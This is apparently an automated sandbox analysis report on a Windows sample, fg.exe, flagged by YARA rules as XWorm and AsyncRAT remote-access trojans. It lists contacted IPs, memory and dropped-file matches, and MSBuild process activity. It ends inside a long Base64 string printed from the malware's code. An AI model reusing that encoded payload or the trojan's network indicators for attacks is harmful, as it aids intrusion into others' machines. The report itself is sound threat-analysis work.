            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 23.199.214.10
            Source: unknownTCP traffic detected without corresponding DNS query: 23.199.214.10
            Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficDNS traffic detected: DNS query: c.pki.goog
            Source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2858010700.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.19.drString found in binary or memory: http://upx.sf.net
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49719 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000008.00000003.1392608875.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000008.00000003.1390048406.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000008.00000003.1392073951.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000008.00000003.1390119908.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            .NET source code contains very large array initializations
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, LoadApiName.csLarge array initialization: Bytes: array initializer size 33280
            Source: 4.2.fg.exe.5150000.4.raw.unpack, LoadApiName.csLarge array initialization: Bytes: array initializer size 33280
            Source: cy31atwy.dll.8.dr, LoadApiName.csLarge array initialization: Bytes: array initializer size 33280
            .NET source code contains very large strings
            Source: fg.exe, GetPool.csLong String: Length: 139156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_011B81D812_2_011B81D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_011B551012_2_011B5510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_011BBBD812_2_011BBBD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_011B5DE012_2_011B5DE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_011BAE9812_2_011BAE98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_011B51C812_2_011B51C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_011B0BA012_2_011B0BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1668
            Source: fg.exe, 00000004.00000000.1358622415.0000000000948000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWarePlay.exe2 vs fg.exe
            Source: fg.exe, 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs fg.exe
            Source: fg.exe, 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecy31atwy.dll4 vs fg.exe
            Source: fg.exe, 00000004.00000002.1401428852.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs fg.exe
            Source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs fg.exe
            Source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecy31atwy.dll4 vs fg.exe
            Source: fg.exeBinary or memory string: OriginalFilenameWarePlay.exe2 vs fg.exe
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000008.00000003.1392608875.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000008.00000003.1390048406.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000008.00000003.1392073951.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000008.00000003.1390119908.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.5150600.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.5150600.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.5150600.3.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: fg.exe, GetPool.csBase64 encoded string: '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